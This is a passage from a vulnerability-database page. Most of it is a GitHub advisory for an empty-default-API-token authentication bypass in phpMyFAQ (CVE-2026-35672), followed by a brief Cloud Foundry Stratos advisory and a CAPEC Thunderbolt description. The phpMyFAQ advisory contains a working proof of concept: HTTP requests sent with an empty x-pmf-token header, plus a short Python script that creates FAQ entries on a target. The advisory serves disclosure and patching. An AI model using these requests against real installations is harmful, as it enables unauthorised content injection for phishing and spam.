      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.1.2"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "phpmyfaq/phpmyfaq"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.1.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-35672"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1188"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-20T15:46:42Z",
    "nvd_published_at": "2026-05-28T16:16:21Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nA default empty API client token allows any unauthenticated user to create and modify FAQ entries, categories, and questions via the REST API. The vulnerability exists in all versions since API v4.0 was introduced because the installation process seeds `api.apiClientToken` with an empty string, and the `hasValidToken()` comparison logic cannot distinguish between \"no token configured\" and \"attacker sent a matching empty token header.\"\n\n### Details\n\nThe root cause is in two files:\n\n**1. Installation default** (`src/phpMyFAQ/Setup/Installation/DefaultDataSeeder.php`, line 277-278):\n\n```php\n\u0027api.enableAccess\u0027   =\u003e \u0027true\u0027,\n\u0027api.apiClientToken\u0027 =\u003e \u0027\u0027,       // \u2190 defaults to empty string\n```\n\n**2. Authentication check** (`src/phpMyFAQ/Controller/AbstractController.php`, line 198-204):\n\n```php\nprotected function hasValidToken(): void\n{\n    $request = Request::createFromGlobals();\n    if ($this-\u003econfiguration-\u003eget(\u0027api.apiClientToken\u0027) !== $request-\u003eheaders-\u003eget(\u0027x-pmf-token\u0027)) {\n        throw new UnauthorizedHttpException(\u0027\"x-pmf-token\" is not valid.\u0027);\n    }\n}\n```\n\nThe method uses strict inequality (`!==`). When `api.apiClientToken` is `\u0027\u0027` (default) and the attacker sends `x-pmf-token: ` (empty header value), the comparison becomes `\u0027\u0027 !== \u0027\u0027` which evaluates to `false` \u2014 no exception is thrown, and authentication is completely bypassed.\n\nThe OpenAPI annotations confirm the developer intended these endpoints to require authentication: write endpoints are tagged `\u0027Endpoints with Authentication\u0027` and document HTTP 401 responses, while read-only endpoints are tagged `\u0027Public Endpoints\u0027`.\n\nThe following API endpoints call `$this-\u003ehasValidToken()` as their only authentication check:\n\n| File                                                    | Endpoint               | Method |\n| ------------------------------------------------------- | ---------------------- | ------ |\n| `src/.../Controller/Api/FaqController.php:701-703`      | `/api/v4.0/faq/create` | `POST` |\n| `src/.../Controller/Api/FaqController.php:857-859`      | `/api/v4.0/faq/update` | `PUT`  |\n| `src/.../Controller/Api/CategoryController.php:278-280` | `/api/v4.0/category`   | `POST` |\n| `src/.../Controller/Api/QuestionController.php:89-91`   | `/api/v4.0/question`   | `POST` |\n\n### PoC\n\n**Environment**: phpMyFAQ 4.2.0-alpha, PHP 8.4.16, SQLite, installed with all defaults.\n\n**Step 1 \u2014 Verify that requests without auth header are correctly rejected:**\n\n```http\nPOST /api/v4.0/faq/create HTTP/1.1\nHost: \u003ctarget\u003e\nContent-Type: application/json\n\n{\n    \"language\": \"en\",\n    \"category-id\": 1,\n    \"question\": \"Test Question\",\n    \"answer\": \"Test Answer\",\n    \"keywords\": \"test\",\n    \"author\": \"test\",\n    \"email\": \"test@test.com\",\n    \"is-active\": true,\n    \"is-sticky\": false\n}\n```\n\nResponse (HTTP 401 \u2014 correctly blocked):\n\n```json\n{\"type\":\".../problems/unauthorized\",\"title\":\"Unauthorized\",\"status\":401,\"detail\":\"Unauthorized access.\",\"instance\":\"/v4.0/faq/create\"}\n```\n\n**Step 2 \u2014 Send the same request with an empty `x-pmf-token` header:**\n\n```http\nPOST /api/v4.0/faq/create HTTP/1.1\nHost: \u003ctarget\u003e\nContent-Type: application/json\nx-pmf-token: \n\n{\n    \"language\": \"en\",\n    \"category-id\": 1,\n    \"question\": \"[POC] Authentication Bypass Confirmed\",\n    \"answer\": \"This FAQ was created without any valid authentication token.\",\n    \"keywords\": \"poc,bypass\",\n    \"author\": \"Security Researcher\",\n    \"email\": \"researcher@example.com\",\n    \"is-active\": true,\n    \"is-sticky\": false\n}\n```\n\nResponse (HTTP 201 \u2014 bypass confirmed):\n\n```json\n{\"stored\": true}\n```\n\n**Step 3 \u2014 Category creation via the same bypass:**\n\n```http\nPOST /api/v4.0/category HTTP/1.1\nHost: \u003ctarget\u003e\nContent-Type: application/json\nx-pmf-token: \n\n{\n    \"language\": \"en\",\n    \"parent-id\": 0,\n    \"category-name\": \"POC_Category\",\n    \"description\": \"Category created via empty token bypass\",\n    \"user-id\": 1,\n    \"group-id\": -1,\n    \"is-active\": true,\n    \"show-on-homepage\": true\n}\n```\n\nResponse (HTTP 201):\n\n```json\n{\"stored\": true}\n```\n\n**Step 4 \u2014 Verify injected content is publicly visible:**\n\n```http\nGET /api/v4.0/faqs/1 HTTP/1.1\nHost: \u003ctarget\u003e\n```\n\nResponse (HTTP 200 \u2014 injected FAQ publicly exposed):\n\n```json\n[{\"record_id\":1,\"record_lang\":\"en\",\"category_id\":1,\"record_title\":\"[POC] Authentication Bypass Confirmed\",\"record_preview\":\"This FAQ was created without any valid authentication token. ...\"}]\n```\n\n**PoC with Python (urllib \u2014 no external dependencies):**\n\n```python\nimport urllib.request, json\n\nTARGET = \"http://\u003ctarget\u003e\"\nHEADERS = {\"Content-Type\": \"application/json\", \"x-pmf-token\": \"\"}\n\n# Create FAQ via empty token bypass\ndata = json.dumps({\n    \"language\": \"en\", \"category-id\": 1,\n    \"question\": \"[POC] Auth Bypass\", \"answer\": \"Created via bypass.\",\n    \"keywords\": \"poc\", \"author\": \"R\", \"email\": \"r@t.com\",\n    \"is-active\": True, \"is-sticky\": False\n}).encode()\nreq = urllib.request.Request(f\"{TARGET}/api/v4.0/faq/create\", data=data, headers=HEADERS, method=\"POST\")\nresp = urllib.request.urlopen(req)\nprint(f\"Status: {resp.status}\")  # 201 \u2014 bypass successful\n```\n\n**Overlap Summary:**\n\n| Test                | x-pmf-token    | HTTP Status      | Result                     |\n| ------------------- | -------------- | ---------------- | -------------------------- |\n| No auth header      | *(not sent)*   | 401 Unauthorized | \ud83d\udd12 Correctly blocked        |\n| Empty token header  | `\"\"`           | **201 Created**  | \ud83d\udd13 Bypass confirmed         |\n| Category creation   | `\"\"`           | **201 Created**  | \ud83d\udd13 Bypass confirmed         |\n| Public verification | *(not needed)* | 200 OK           | \ud83d\udcc4 Injected content visible |\n\n### Impact\n\nThis is an **authentication bypass (CWE-1188)** affecting any phpMyFAQ installation where the administrator has not explicitly set a non-empty API client token \u2014 which is the **default state after installation**.\n\n- **Who is impacted?** Any organization running phpMyFAQ with default configuration. The REST API is enabled by default, and the token defaults to empty. No action by the administrator is required for the vulnerability to exist \u2014 it is the out-of-the-box state.\n- **What can an attacker do?** Create and modify FAQ entries, categories, and questions without any authentication. This enables content injection for phishing, SEO spam, reputation damage, and distribution of malicious links through the knowledge base.\n- **What is NOT affected?** Read-only API endpoints are intentionally public. Session-authenticated admin endpoints are not affected. File upload and backup endpoints require separate session-based authentication.",
  "id": "GHSA-gp95-j463-vv28",
  "modified": "2026-06-09T00:05:52Z",
  "published": "2026-05-20T15:46:42Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-gp95-j463-vv28"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35672"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/thorsten/phpMyFAQ"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/phpmyfaq-authentication-bypass-via-empty-api-token"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ],
  "summary": "phpMyFAQ: Default Empty API Token Authentication Bypass"
}

GHSA-GQG8-8X59-R3XM

Vulnerability from github – Published: 2022-05-13 01:14 – Updated: 2022-05-13 01:14
VLAI
Details

Cloud Foundry Stratos, versions prior to 2.3.0, deploys with a public default session store secret. A malicious user with default session store secret can brute force another user's current Stratos session, and act on behalf of that user.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-3783"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1188"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-03-07T18:29:00Z",
    "severity": "HIGH"
  },
  "details": "Cloud Foundry Stratos, versions prior to 2.3.0, deploys with a public default session store secret. A malicious user with default session store secret can brute force another user\u0027s current Stratos session, and act on behalf of that user.",
  "id": "GHSA-gqg8-8x59-r3xm",
  "modified": "2022-05-13T01:14:28Z",
  "published": "2022-05-13T01:14:28Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-3783"
    },
    {
      "type": "WEB",
      "url": "https://www.cloudfoundry.org/blog/cve-2019-3783"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

No mitigation information available for this CWE.

CAPEC-665: Exploitation of Thunderbolt Protection Flaws

An adversary leverages a firmware weakness within the Thunderbolt protocol, on a computing device to manipulate Thunderbolt controller firmware in order to exploit vulnerabilities in the implementation of authorization and verification schemes within Thunderbolt protection mechanisms. Upon gaining physical access to a target device, the adversary conducts high-level firmware manipulation of the victim Thunderbolt controller SPI (Serial Peripheral Interface) flash, through the use of a SPI Programing device and an external Thunderbolt device, typically as the target device is booting up. If successful, this allows the adversary to modify memory, subvert authentication mechanisms, spoof identities and content, and extract data and memory from the target device. Currently 7 major vulnerabilities exist within Thunderbolt protocol with 9 attack vectors as noted in the Execution Flow.